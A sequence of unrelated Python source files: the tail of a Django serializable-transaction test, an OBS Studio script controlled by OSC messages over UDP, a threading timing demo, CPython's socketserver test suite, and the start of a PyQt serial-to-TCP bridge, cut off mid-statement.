barrier_1 = threading.Barrier(2)
barrier_2 = threading.Barrier(2)
barrier_3 = threading.Barrier(2)
def serializable_a():
with transaction.atomic():
cursor = connection.cursor()
cursor.execute('SET TRANSACTION ISOLATION LEVEL SERIALIZABLE')
Sock.objects.all().count()
barrier_1.wait()
Sock.objects.get(id_a=2).save()
barrier_2.wait()
caught = None
def serializable_b():
nonlocal caught
try:
with transaction.atomic():
cursor = connection.cursor()
cursor.execute('SET TRANSACTION ISOLATION LEVEL SERIALIZABLE')
Sock.objects.all().count()
barrier_1.wait()
Sock.objects.get(id_a=1).save()
barrier_2.wait()
except Exception as exception:
caught = exception
serializable_a_thread = threading.Thread(target=serializable_a)
serializable_a_thread.start()
serializable_b_thread = threading.Thread(target=serializable_b)
serializable_b_thread.start()
serializable_a_thread.join()
serializable_b_thread.join()
assert isinstance(caught, DatabaseError)
assert 'could not serialize access due to read/write dependencies among transactions' in caught.args[0]
|
OBS_OSC.py
|
#!/usr/bin/python
#
# OBS_OSC.py
#
# by Claude Heintz
# copyright 2014-2020 by Claude Heintz Design
#
# see license included with this distribution or
# https://www.claudeheintzdesign.com/lx/opensource.html
#
import socket
import threading
import time
from select import select
import math
import struct
import obspython as obs
OBS_OSC_PORT = 17999
OBS_OSC_AUTO_START = 1
#########################################
#
# This script responds to OSC messages received from port OBS_OSC_PORT
# in OSCListener's dispatch_message() method by calling the appropriate
# functions from obspython
#
# Note:
# Most OSC triggers require a 1.0 float argument [1.0] so that
# they are compatible with TouchOSC type buttons which
# send 1.0 when pressed and 0.0 when released.
#
# Arguments in the messages reference are noted with brackets []
#
# -------------------------------------------
#
# OBS OSC Messages:
#
#
# /obs/transition/start [1.0]
# triggers the current transition
#
# /obs/transition/NN/select [1.0]
# selects transition number NN (1 based)
# /obs/transition/1/select chooses first transition (index 0 in obspython)
#
# /obs/transition/NN/start [1.0]
# selects and executes transition number NN (1 based index)
# /obs/transition/1/start chooses first transition (index 0 in obspython)
#
# /obs/transition/duration [DD]
# sets duration of current transition. DD is int argument in microseconds.
#
# /obs/transition/NN/duration [DD]
# sets duration of transition number NN (1 based).
# DD is int argument in microseconds.
#
# /obs/transition/duration/DD [1.0]
# sets duration of current transition. DD is in microseconds.
# argument is 1.0 float for button trigger
#
# /obs/scene/NN/preview [1.0]
# selects scene number NN (1 based)
# /obs/scene/1/preview sets the preview to the first scene (index 0 in obspython)
#
# /obs/scene/NN/start [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# following the transition, the next scene is selected for preview
#
# /obs/scene/NN/go [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# following the transition, the next scene is selected for preview
#
# /obs/scene/1/go sets the preview to the first scene (index 0 in obspython)
# following the transition, the second scene is set to preview
#
# /obs/scene/NN/transition/MM/start [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# using transition number MM (1 based)
#
# /obs/scene/NN/transition/MM/go [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# using transition number MM (1 based)
# following the transition, the next scene is selected for preview
#
# /obs/scene/2/transition/2/go sets the preview to the second scene in the list
# (index 1 in obspython) then transitions to that scene using the second transition
# (index 1 in obspython)
# following the transition, the third scene is set to preview
#
# /obs/go [1.0]
# transitions to the current previewed scene using the current transition
# following the transition, the scene following the former preview scene
# in the scene list is selected for preview
#
# /obs/recording/start [1.0]
# starts recording
#
# /obs/recording/stop [1.0]
# stops recording
#
# /obs/streaming/start [1.0]
# starts streaming
#
# /obs/streaming/stop [1.0]
# stops streaming
#
#########################################
#########################################
#
# OSCListener
# implements basic OSC UDP receiving and parsing
#
# start_listening(port)
# starts a thread that listenes for UDP packets on the specified port
#
# stop_listening()
# terminates the listen loop/thread
#
# dispatch_message()
# is called when an OSC message is received, after
# its addressPattern and args[] are extracted
# obspython methods are called based on the addressPattern
#
#########################################
class OSCListener:
def __init__(self):
self.listen_thread = None
#########################################
#
# start_listening creates the listening socket
# and creates a thread that runs the listen() method
#
#########################################
def start_listening(self, port):
self.udpsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udpsocket.bind(('',port))
self.udpsocket.setblocking(False)
self.udpsocket.settimeout(1)
self.listening = True
if self.listen_thread is None:
self.listen_thread = threading.Thread(target=self.listen)
self.listen_thread.daemon = True
self.listen_thread.start()
#########################################
#
# stop_listening sets a flag which will cause the listen loop to end on the next pass
#
#########################################
def stop_listening(self):
self.listening = False
self.udpsocket.close()
self.udpsocket = None
#########################################
#
# listen contains a loop that runs while the self.listening flag is True
# listen uses select to determine if there is data available from the port
# if there is, packet_received is called
# if not, the thread sleeps for a tenth of a second
#
#########################################
def listen(self):
input = [self.udpsocket]
while self.listening:
if self.udpsocket != None and self.udpsocket.fileno() >= 0:
inputready,outputready,exceptready = select(input,[],[],0)
if ( len(inputready) == 1 ):
self.data,addr = self.udpsocket.recvfrom(256)
self.msglen = len(self.data)
self.packet_received()
else:
time.sleep(0.1)
else:
self.listening = false
self.listen_thread = None
#########################################
#
# packet_received
# calls process_message_at for each complete OSC message
# contained in the packet
#
#########################################
def packet_received(self):
dataindex = 0
while ( (dataindex >= 0 ) and ( dataindex < self.msglen ) ):
dataindex = self.process_message_at(dataindex);
#########################################
#
# process_message_at
# extracts the addressPattern and argument list from the OSC message
#
# currently the only supported arguments are floats and integers and strings
#
# returns the index at the end of the complete message
#
#########################################
def process_message_at(self, si):
oi = 0;
dl = 0;
zl = self.next_zero(si)
#insure that string will terminate with room for 4 bytes of type definition
if zl + 4 < self.msglen:
addressPattern = self.string_from_index(si)
if addressPattern.startswith('/'):
# determine the current index for the type character
tl = self.next_index_for_string(addressPattern,si)
# determine the current index for the data location
dl = self.next_index_for_index(self.next_zero(tl))
# if there's space for at least one argument, start a loop extracting
# arguments defined in the type string an adding them to the args list
if dl+4 <= self.msglen:
if self.data[tl] == ord(','):
tl += 1
args = []
done = False
while ( not done) and ( (dl+4) <= self.msglen ):
if self.data[tl] == 0:
done = True
elif self.data[tl] == ord('f'):
a = struct.unpack_from('>f', self.data, dl)
args.append(float(a[0]))
dl += 4
elif self.data[tl] == ord('i'):
a = struct.unpack_from('>i', self.data, dl)
args.append(int(a[0]))
elif self.data[tl] == ord('s'):
es = self.next_zero(dl)
if es <= self.msglen:
a = self.string_from_index(dl)
args.append(a)
dl = self.next_index_for_index(es)
else:
done = True
oi = -1
else: #unrecognized argument don't know length
done = True
oi = -1
tl += 1
# when done with the argument extraction loop, call dispatch_message
self.dispatch_message(addressPattern, args)
else: # <- no arguments but an address pattern
oi = -1
self.dispatch_message(addressPattern, [])
else:
oi = -1
if oi != -1:
oi = dl #dl could point to another message within the packet
return oi
#########################################
#
# next_zero
# searches for the next null character in the data starting at index si
#
#########################################
def next_zero(self, si):
i = si
notfound = True
s = ''
while notfound and i<self.msglen:
if self.data[i] == 0:
notfound = False
else:
i += 1
return i
#########################################
#
# next_index_for_string
# determines a 4 byte padded index for the
# length of the string starting from si
#
#########################################
def next_index_for_string(self, s, start):
ml = math.trunc(len(s) / 4) + 1;
return start + (ml*4);
#########################################
#
# next_index_for_index
# determines a 4 byte padded index starting from i
#
#########################################
def next_index_for_index(self, i):
ml = math.trunc(i / 4) + 1;
return ml*4;
#########################################
#
# string_from_index
# extracts a null terminated string starting at index si
#
#########################################
def string_from_index(self, si):
i = si
noterm = True
s = ''
while noterm and i<len(self.data):
if self.data[i] == 0:
noterm = False
else:
s += chr(self.data[i])
i += 1
return s
#########################################
#
# check_arg_one()
# Check for a single float argument equal to 1.0.
#
# used for actions controlled by a push button
# that sends 1.0 when pressed
# 0.0 when released
#
#########################################
def check_arg_one(self, args):
if len(args) == 1:
if args[0] == 1.0:
return True
return False
#########################################
#
# dispatch_message
# called when OSC Message is received and processed
#
#########################################
def dispatch_message(self, addressPattern, args):
# break addressPattern into parts
parts = addressPattern.split('/')
if len(parts) > 2:
if parts[1] == "obs": #/obs/...
if parts[2] == "source": # /obs/source/...
self.dispatch_obs_source(parts, args)
elif parts[2] == "transition": # /obs/transition/...
self.dispatch_obs_transition(parts, args)
elif parts[2] == "scene": # /obs/scene/...
self.dispatch_obs_scene(parts, args)
elif parts[2] == "go": # /obs/go
self.dispatch_obs_go(parts, args)
elif parts[2] == "recording": # /obs/recording/...
self.dispatch_obs_recording(parts, args)
elif parts[2] == "streaming": # /obs/streaming/...
self.dispatch_obs_streaming(parts, args)
#########################################
#
# dispatch_obs_source(self, parts, args)
# /obs/source/...
#
#########################################
def dispatch_obs_source(self, parts, args):
if len(parts) == 4:
if parts[3] == "volume": # /obs/source/volume [NN, V.V]
if len(args) == 2:
source_volume(args[0], args[1])
if len(parts) == 5:
if parts[4] == "volume": # /obs/source/NN/volume [V.V]
if len(args) == 1:
source_volume(parts[3], args[0])
#########################################
#
# dispatch_obs_transition(self, parts, args)
# /obs/transition/...
#
#########################################
def dispatch_obs_transition(self, parts, args):
if len(parts) == 4:
if parts[3] == "start": # /obs/transition/start [1.0]
if self.check_arg_one(args):
transition()
elif parts[3] == "duration": # /obs/transition/duration [DD]
set_transition_duration(int(args[0]))
if len(parts) == 5: # /obs/transition/NN/start [1.0]
if parts[4] == "start":
if self.check_arg_one(args):
transition(int(parts[3])-1)
elif parts[4] == "select": # /obs/transition/NN/select [1.0]
if self.check_arg_one(args):
set_transition(int(parts[3])-1)
elif parts[4] == "duration": # /obs/transition/NN/duration [DD]
set_transition_duration(int(args[0]), int(parts[3])-1)
elif parts[3] == "duration": # /obs/transition/duration/DD [1.0]
if self.check_arg_one(args):
set_transition_duration(int(parts[4]))
#########################################
#
# dispatch_obs_scene(self, parts, args)
# /obs/scene/...
#
#########################################
def dispatch_obs_scene(self, parts, args):
if self.check_arg_one(args):
if len(parts) == 5:
if parts[4] == "preview": # /obs/scene/n/preview
set_preview(int(parts[3])-1)
elif parts[4] == "start": # /obs/scene/n/start
set_preview(int(parts[3])-1)
time.sleep(0.2)
transition()
elif parts[4] == "go": # /obs/scene/n/go
set_preview(int(parts[3])-1)
time.sleep(0.2)
go()
elif len(parts) == 7:
if parts[4] == "transition":
if parts[6] == "start":
set_preview(int(parts[3])-1)
time.sleep(0.2)
transition(int(parts[5])-1)
elif parts[6] == "go":
set_preview(int(parts[3])-1)
time.sleep(0.2)
go(int(parts[5])-1)
#########################################
#
# dispatch_obs_go(self, parts, args)
# /obs/go [1.0]
#
#########################################
def dispatch_obs_go(self, parts, args):
if self.check_arg_one(args):
go()
#########################################
#
# dispatch_obs_recording(self, parts, args)
# /obs/recording/...
#
#########################################
def dispatch_obs_recording(self, parts, args):
if self.check_arg_one(args):
if len(parts) == 4:
if parts[3] == "start": # /obs/recording/start
obs.obs_frontend_recording_start()
if parts[3] == "stop": # /obs/recording/stop
obs.obs_frontend_recording_stop()
#########################################
#
# dispatch_obs_streaming(self, parts, args)
# /obs/streaming/...
#
#########################################
def dispatch_obs_streaming(self, parts, args):
if self.check_arg_one(args):
if len(parts) == 4:
if parts[3] == "start": # /obs/streaming/start
obs.obs_frontend_streaming_start()
if parts[3] == "stop": # /obs/streaming/stop
obs.obs_frontend_streaming_stop()
############################################
#^^^^^^^^^^ end class OSCListener ^^^^^^^^^^
#
# begin main section
############################################
# global OSCListener object
oscin = None
#########################################
#
# set_preview(idx)
# sets the OBS preview to scene with index idx if it exists
#
#########################################
def set_preview(idx):
scenes = obs.obs_frontend_get_scenes()
if idx < len(scenes) and idx >= 0:
obs.obs_frontend_set_current_preview_scene(scenes[idx])
#########################################
#
# set_transition(idx)
# selects the OBS transition with index idx if it exists
#
#########################################
def set_transition(idx):
transitions = obs.obs_frontend_get_transitions()
if idx < len(transitions) and idx >= 0:
obs.obs_frontend_set_current_transition(transitions[idx])
#########################################
#
# set_transition_duration(idx)
# selects the OBS transition with index idx if it exists
#
#########################################
def set_transition_duration(d, idx=-1):
trans = None
if idx == -1:
trans = obs.obs_frontend_get_current_transition()
else:
transitions = obs.obs_frontend_get_transitions()
if idx < len(transitions) and idx >= 0:
trans = transitions[idx]
if trans != None:
obs.obs_transition_enable_fixed(trans, True, d)
#########################################
#
# nextScene()
# returns the next scene after the current preview scenes
# returns the first scene if reached the end of the list or otherwise
# (must have at least one scene or index error will throw)
#
#########################################
def nextScene():
scenes = obs.obs_frontend_get_scenes()
if len(scenes) > 1:
c_scene = obs.obs_frontend_get_current_preview_scene()
if c_scene != None:
i = scenes.index(c_scene) + 1
if i < len(scenes):
return scenes[i]
return scenes[0]
#########################################
#
# transition(idx)
# executes the transition with index idx
#
# transition()
# executes the currently selected transition
#
#########################################
def transition(idx = -1):
trans = None
if idx >= 0 :
set_transition(idx)
trans = obs.obs_frontend_get_current_transition()
mode = obs.OBS_TRANSITION_MODE_AUTO
duration = 0
p_scene = obs.obs_frontend_get_current_preview_scene()
obs.obs_transition_start(trans, mode, duration, p_scene)
obs.obs_frontend_set_current_scene(p_scene)
#########################################
#
# go()
# executes the currently selected transition
# then selects the next scene for preview
#
# go(idx)
# executes the transition with index idx
# then selects the next scene for preview
#
#########################################
def go(idx = -1):
n_scene = nextScene()
transition(idx)
time.sleep(2)
obs.obs_frontend_set_current_preview_scene(n_scene)
def source_volume(src, volume):
#n_scene = nextScene()
sources = obs.obs_enum_sources()
found = None
if sources is not None:
for source in sources:
source_id = obs.obs_source_get_id(source)
name = obs.obs_source_get_name(source)
if name == src:
found = source
if found != None:
obs.obs_source_set_volume(found, float(volume))
#########################################
# start_osc
# create OSCListener if needed and start listening
#########################################
def start_osc():
global oscin
global OBS_OSC_PORT
if oscin == None:
oscin = OSCListener()
oscin.start_listening(OBS_OSC_PORT)
print("OSC started on port " + str(OBS_OSC_PORT))
#########################################
# stop_osc
# if OSCListener exists, stop listening & release
#########################################
def stop_osc():
global oscin
if oscin != None:
oscin.stop_listening()
oscin = None
print("OSC stopped.")
#########################################
# listen_pressed
# callback when start button clicked
#########################################
def listen_pressed(props, prop):
start_osc()
#########################################
# stop_pressed
# callback when start button clicked
#########################################
def stop_pressed(props, prop):
stop_osc()
#########################################
# port_field_changed
# callback when the port number is changed
#########################################
def port_field_changed(props, prop_id, settings_data):
global oscin
global OBS_OSC_PORT
global OBS_OSC_AUTO_START
pport = obs.obs_data_get_int(settings_data, "osc-port")
if pport != 0:
OBS_OSC_PORT = pport
if oscin != None:
stop_osc()
print("restarting...")
start_osc()
#########################################
# obspython functions
#########################################
def script_defaults(settings_data):
global OBS_OSC_PORT
obs.obs_data_set_int(settings_data, "osc-port", OBS_OSC_PORT)
def script_update(settings):
global OBS_OSC_AUTO_START
if OBS_OSC_AUTO_START == 1:
start_osc()
OBS_OSC_AUTO_START = 0 #only first time
def script_unload():
stop_osc()
def script_description():
return '''Control OBS preview, transitions and start/stop via OSC.'''
def script_properties():
props = obs.obs_properties_create()
obs.obs_properties_add_button(props, "start-button", "Start OSC", listen_pressed)
obs.obs_properties_add_button(props, "stop-button", "Stop OSC", stop_pressed)
port_field = obs.obs_properties_add_int(props, "osc-port", "OSC Port", 1001, 99999, 1)
obs.obs_property_set_modified_callback(port_field, port_field_changed)
return props
|
two_thread.py
|
## в два потока
import time
from threading import Thread
def countup(N):
n = 0
while n < N:
n += 1
if __name__ == '__main__':
max_for_thread = 30000000//2
first_thread = Thread(target=countup, args=(max_for_thread,))
second_thread = Thread(target=countup, args=(max_for_thread,))
st_time = time.time()
first_thread.start()
second_thread.start()
first_thread.join()
second_thread.join()
end_time = time.time()
print(f'Время выполнения: {end_time-st_time}')
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import threading
import unittest
import socketserver
import test.support
from test.support import reap_children, reap_threads, verbose
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = test.support.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = hasattr(os, "fork")
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=test.support.SHORT_TIMEOUT):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
pass
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
pass
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
try:
yield None
except:
raise
finally:
test.support.wait_process(pid, exitcode=72)
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
try:
server = MyServer(addr, MyHandler)
except PermissionError as e:
# Issue 29184: cannot bind() a Unix socket on Android.
self.skipTest('Cannot create server (%s, %s): %s' %
(svrcls, addr, e))
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_STREAM) as s:
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def dgram_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_DGRAM) as s:
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making an
# other thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
# Create many servers for which bind() will fail, to see if this result
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
test.support.unlink(test.support.TESTFN)
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
def test_threading_not_handled(self):
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(test.support.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(test.support.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(test.support.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
pass
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
main.py
|
# -*- coding: utf-8 -*-
import socket
import serial
import serial.tools.list_ports
import sys
from subprocess import PIPE, Popen
from threading import Thread
import os
import re
import signal
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty # python 2.x
from PyQt5.QtWidgets import (
QApplication, QMainWindow, QMessageBox
)
from PyQt5 import QtGui
from main_window_ui import Ui_oMainWind
class Window(QMainWindow, Ui_oMainWind):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.sys_ports = []
self.ui = Ui_oMainWind()
self.ui.setupUi(self)
self.connectSignalsSlots()
self.bStartStopFlag = False
self.oSocketHolder = None
self.oSerialHolder = None
self.oConnectHolder = None
self.bNormalConnect = False
self.oProcess = Popen
self.oQueue = Queue
self.oThread = Thread
def connectSignalsSlots(self):
self.ui.oActInfo.triggered.connect(self.about)
self.ui.oActExit.triggered.connect(self.close)
self.ui.oEntryIp0.setText('192')
self.ui.oEntryIp1.setText('168')
self.ui.oEntryIp2.setText('1')
self.ui.oEntryIp3.setText('111')
self.ui.oEntryPort.setText('7000')
self.updateComList()
self.ui.oButStartStop.clicked.connect(self.startStopBind)
def startStopBind(self):
l_label = ['Stop', 'Start']
self.bStartStopFlag = not self.bStartStopFlag
print('The start flag: {}'.format(self.bStartStopFlag))
self.ui.oButStartStop.setText(l_label[int(not self.bStartStopFlag)])
if not self.bStartStopFlag:
self.ui.oListBoxCom.setDisabled(False)
self.ui.oEntryIp0.setDisabled(False)
self.ui.oEntryIp1.setDisabled(False)
self.ui.oEntryIp2.setDisabled(False)
self.ui.oEntryIp3.setDisabled(False)
self.ui.oEntryPort.setDisabled(False)
self.ui.oLbStatus.setPixmap(QtGui.QPixmap(":/red.png"))
self.closeAll()
else:
self.ui.oListBoxCom.setDisabled(True)
self.ui.oEntryIp0.setDisabled(True)
self.ui.oEntryIp1.setDisabled(True)
self.ui.oEntryIp2.setDisabled(True)
self.ui.oEntryIp3.setDisabled(True)
self.ui.oEntryPort.setDisabled(True)
self.ui.oLbStatus.setPixmap(QtGui.QPixmap(":/green.png"))
self.startTcpIpCom()
@staticmethod
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def startTcpIpCom(self):
s_my_ip = '{}.{}.{}.{}'.format(
self.ui.oEntryIp0.text(),
self.ui.oEntryIp1.text(),
self.ui.oEntryIp2.text(),
self.ui.oEntryIp3.text()
)
print('Site address: {};{}'.format(s_my_ip, self.ui.oEntryPort.text()))
print('Com Select: {}'.format(self.ui.oListBoxCom.currentText()))
print('Port Select: {}'.format(self.ui.oEntryPort.text()))
self.oProcess = Popen(['com2tcp-rfc2217.bat',
'\\\\.\\{}'.format(self.ui.oListBoxCom.currentText()),
s_my_ip,
